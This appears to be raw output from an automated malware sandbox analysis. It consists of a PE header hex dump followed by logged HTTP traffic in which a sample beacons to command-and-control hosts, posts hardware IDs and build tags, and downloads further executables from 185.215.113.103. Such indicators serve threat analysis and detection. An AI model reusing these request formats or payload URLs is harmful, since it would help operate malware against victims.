00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 11:27:25 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 10:55:59 GMTETag: "1cbe00-623e0ddae02ba"Accept-Ranges: bytesContent-Length: 1883648Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 70 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4b 00 00 04 00 00 ad 65 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 00 06 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 64 6e 65 65 68 6c 64 00 30 1a 00 00 30 31 00 00 26 1a 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 68 78 67 70 7a 71 6b 6d 00 10 00 00 00 60 4b 00 00 04 00 00 00 98 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4b 00 00 22 00 00 00 9c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: */*APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1728300660577Host: self.events.data.microsoft.comContent-Length: 7971Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000332001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAECGIEBKKFHIDAKECHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 41 36 33 45 41 31 42 45 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 41 45 43 47 49 45 42 4b 4b 46 48 49 44 41 4b 45 43 2d 2d 0d 0a Data Ascii: ------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="hwid"D1A63EA1BE9A291931458------FCBAECGIEBKKFHIDAKECContent-Disposition: form-data; name="build"doma------FCBAECGIEBKKFHIDAKEC--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 33 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000336001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.103
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 33 34 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000349001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDHCGHDHIDHCBGCBGCAHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 41 36 33 45 41 31 42 45 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 48 43 47 48 44 48 49 44 48 43 42 47 43 42 47 43 41 2d 2d 0d 0a Data Ascii: ------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="hwid"D1A63EA1BE9A291931458------DHDHCGHDHIDHCBGCBGCAContent-Disposition: form-data; name="build"doma------DHDHCGHDHIDHCBGCBGCA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCFCAKFHCGCBFHCGHDHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 31 41 36 33 45 41 31 42 45 39 41 32 39 31 39 33 31 34 35 38 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 46 43 41 4b 46 48 43 47 43 42 46 48 43 47 48 44 2d 2d 0d 0a Data Ascii: ------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="hwid"D1A63EA1BE9A291931458------KEGCFCAKFHCGCBFHCGHDContent-Disposition: form-data; name="build"doma------KEGCFCAKFHCGCBFHCGHD--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
